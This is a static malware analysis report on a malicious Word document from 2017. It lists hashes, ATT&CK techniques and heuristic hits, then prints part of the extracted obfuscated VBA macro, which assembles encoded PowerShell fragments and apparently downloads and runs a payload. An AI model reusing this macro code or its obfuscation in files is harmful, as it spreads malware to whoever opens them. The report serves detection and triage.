Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12c221d748d799e5…

MALICIOUS

Office (OLE)

91.0 KB Created: 2017-10-27 06:25:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 743f30e15f16394f1c7c972c7aefef4a SHA-1: c27262a757ba18987ea43f56d738ad5dd3e078fc SHA-256: 12c221d748d799e5f6161f83151a2f9f4fb7a889ca7452a5027d20d5fe5d4436
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to execute arbitrary commands. The presence of obfuscated code and a ClamAV detection for macro obfuscation further supports its malicious nature. The primary intent appears to be downloading and executing a secondary payload.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52362 bytes
SHA-256: ef1d3632bd0c683f0ce654c55f75cc7f6ecaf1ca7870f97a6644ce86a03e0ab3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 84 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function tGnGJwjzK()
XZYIZLVNKR = "UD9BJHVPWD2DMUVRDI22ZUDPLQSNadzkIwhNFpUsOUZ0D"
ulShEnnU = Mid(XZYIZLVNKR, 27, 14)
QzdoozpJw = ulShEnnU
OiqBp = "M5LQYLLT3DloEpUsVfWbjtESaGHjHGwniplMWspNRhWpodGXCmFjMdoEQtHQZtUiGzGOEIVcqJJzWPizAjhVAMbEAjvdlZnYMniqWrStQdtCTphAPJPqMwhuVCNXMsrQWkmjhnbJQnFXTYkLwuObJwMOFoUUdujXlcjiCwTbiGFLUSPDO8"
YwkTaWLO = Mid(OiqBp, 10, 161)
mAzmrZjotkc = YwkTaWLO
TnwES = "3QFP4T5VXCIEI6tWUHKiUZIbbDRLYiFPsYqrWEBkCifvDCAsV8JKV4OGA5V5O5QS962"
iTwfu = Mid(TnwES, 15, 34)
nOtKZWm = iTwfu
NojXt = "W5S17YTKWKD74N1RFE6JlzmBAvdXiGjtZlZGWHzaKCSDaoBiOXOHbOYCbvsQVpEwrsRUGmhLWmKihiaMuuILsZRKMXibOiEVzVMiXhcbpNEQRV"
LIEiwZJU = Mid(NojXt, 21, 85)
iHbCflWt = LIEiwZJU
wVqvENS = "6DQ777DMOnFRdWhnjqLRqzZwFWmFYfKddMIdlZlppiLiPikjuzFBwdAVvSraIzoidboRNECGEVcIoujXmGLYaJizLniShLhrtcBnuSSpzwwdBsjAjUoCmQITzoFaWjZtolOMtvdTnWbcMBwTGhjNWfEdThqFMsTNZDoPiUGorVOQojGwqmTozLWJjksMEXGvCNCJMiomauWBQopnatOZYiNNjfitbujTOEYIGNRDAXGK047BKOYL90"
SbEpTWGz = Mid(wVqvENS, 7, 219)
joRlGr = SbEpTWGz
dHTJsbujXM = "MIW2MLU2KLG6E4KzpchzvKjLCnzaOKdJGbqQIYLmqwWIZKhvpboUCIDXhumhuRjuIACFjHqQRvJwnXmsGCD0ZV76RRVZJBNGA"
LPZVwjiZu = Mid(dHTJsbujXM, 16, 67)
ZzzfCLMuGYn = LPZVwjiZu
dpQhlQn = "EWIHJC1svFlKJjXY3530TZQICKKRP0AW"
owWwwvUJzZd = Mid(dpQhlQn, 8, 9)
GbwGPztn = owWwwvUJzZd
UlwJjlztG = "NARX31TUQWXUFD51WYH01RrJYvlTwbEwFvKFHjNsjYKktTTrkWQlDrTkuVXYYQzVGSizDirQDJLbwGPFctjaLTvOcZLlIpUPZodaoToFfzhtjronFSwihZJnXQWdTFIOpvCHcoQIFdvLlBhkkXfptphAfqCYzKmZrTEkphKRCnYDdzCWilsvZSUzOCbmlrKvrVURwwvDOHXE28F4BXYKI"
tYQCbW = Mid(UlwJjlztG, 23, 177)
oKYlPH = tYQCbW
zEiPSojrLJE = "GOXC8NGRMO2M448Z1XBYO3tFncCEHJbOboIiQsttAkSFmKXwQCPDOdBrSCHNOtvBaFMSsIWtwbSamoScEDoEuXAwmRLNljiGpRihwEFIjVHmKbEikiILFqGDFOjbwIIQwMlVJliAwjYYQNnLMhdGXTBwKbcjXdLYNrqwpjUzzIMZShmsaVPOfBsdKmKiIucUUALZXpVcNiGPGcjdojJCOzsLwMnDYmqFjsESVNVPZE0TX"
NAZvCj = Mid(zEiPSojrLJE, 23, 209)
fwAISjFsS = NAZvCj
CJAaLnjC = "OHZYtKazRBZRiPHZYYdtSGfVGhlrsCJAbmtDXoVvNXDcVO9ELYHDAS34C00R"
wMfMvQfFDQr = Mid(CJAaLnjC, 3, 44)
hCtzX = wMfMvQfFDQr
YwYfETuUsV = "K39726ESGBlnWIHwYTjOlirZRbAYIcPhkXDHzGjJHubsftYAtEjNYcimDkiMXNkdmECwFzwRjZGrDztXDAiDvCJIsQEPbXmuJzFbrZutFOdwVnjEqHIXjjikvuGovjqMnMhFtSjdFkwjYKnEjzYUOOLdOUfwSGwVYRLIFdKYafSwhCMlGBHvKVzYBErYmjKwmdIGwizDoAujwNvMIupRwCLCTnHBmmlqUTLE0LOATH"
HHcnbwp = Mid(YwYfETuUsV, 11, 218)
mihiFIU = HHcnbwp
End Function
Function nPWlrffCd()
DFVojjckj = "BGDX6W8AbQBlAFsAMgAxAF0AKwAkAFAAUwBIAE8ATQBlAFsAMwA0AF0AKwAnAHgAJwAp65DJ9Y8K06G60TMLXD225V"
KCEjttz = Mid(DFVojjckj, 7, 62)
AphGMEJqwvi = KCEjttz
LvYwwtRiq = "WCFEOJ8LADUAOgA2ADcAQwAxADEAMQBqADEAMAA5AHsANwA5AHYAOQA4AH4AMQAwADYAUwAxADAAMQB5ADkAOQB4ADEAMQA2AHgAMwAyAHgAOAA3AHgAOAAzAHgAOQA5AH4AMQAxADQAaAAxADAANQB7ADEAMQAyAGoAMQAxADYAOgA0ADYAdgA4ADMAaAAxADAANABDADEAMAAxAHYAMQAwADgAeAAxADAAOABDADUAOQB+ADMANgBqADEAMQA5AHgAMQAwADEAfgA5ADgAaAA5ADkAQwAxADAA4W605RG4J9J"
jGTwVKqiX = Mid(LvYwwtRiq, 9, 284)
wkwAK = jGTwVKqiX
LaflDl = "BUGQR1N9BKTYB5ADQANwBTADQANAA6ADEAMAA0AEMAMQAxADYAagAxADEANgB2ADEAMQAyAFMANQA4AHsANAA3ADoANAAOMUKQ33Z"
wYobKtrQ = Mid(LaflDl, 14, 80)
ujnnbrbWvZi = wYobKtrQ
FXNkirjT = "CZCYKXJYVAxADYAeQAxADEANAB7ADEAMgAxAEMAMQAyADMAdgAzADYAaAAxADEAOQBqADEAMAAxAHYAOQA4AH4AOQA5AGoAMQAwADgAdgAxADAANQB5ADEAMAAxAEMAMQAxADAAfgAxADEANgBqADQANgA6ADYAOABoADEAMQAxAHgAMQAxADkAfgAxADEAMAB7ADEAMAA4AGgAMQAxADEAOgA5ADcAaAAxADAAMAB5ADcAMAB2ADEAMAA1AHgAMQAwADgAewAx6L2A2FPIP"
IqdGMWjvZHj = Mid(FXNkirjT, 10, 258)
QpuKrE = IqdGMWjvZHj
nmBWwSLm = "RHYX28R76X8YXLSFTHC1QU8AG2AOQA3AHgAMQAxADAAeQAxADAAMAB2ADEAMQAxAGoAMQAwADkAOgA0ADYAewAxADEAMABqADEAMAAxAGoAMQAyADAAOgAxADEANgBqADQAMAA6ADQAOQBqADQANAB7ADMAMgBoADUANABoADUAMwBDADUAMwB4ADUAMQB4ADUANABoADQAMQB2ADUAOQB2ADMANgB7ADEAMQAyAFMAOQA3AEMAMQAxADYAQwAxADAANAB2ADMAMgB5ADYAMQBoADMAMgBqADMANgB2ADEAMAAxAEMAMQAxVHI"
DQCmB = Mid(nmBWwSLm, 27, 285)
CFQpjSDhIjU = DQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.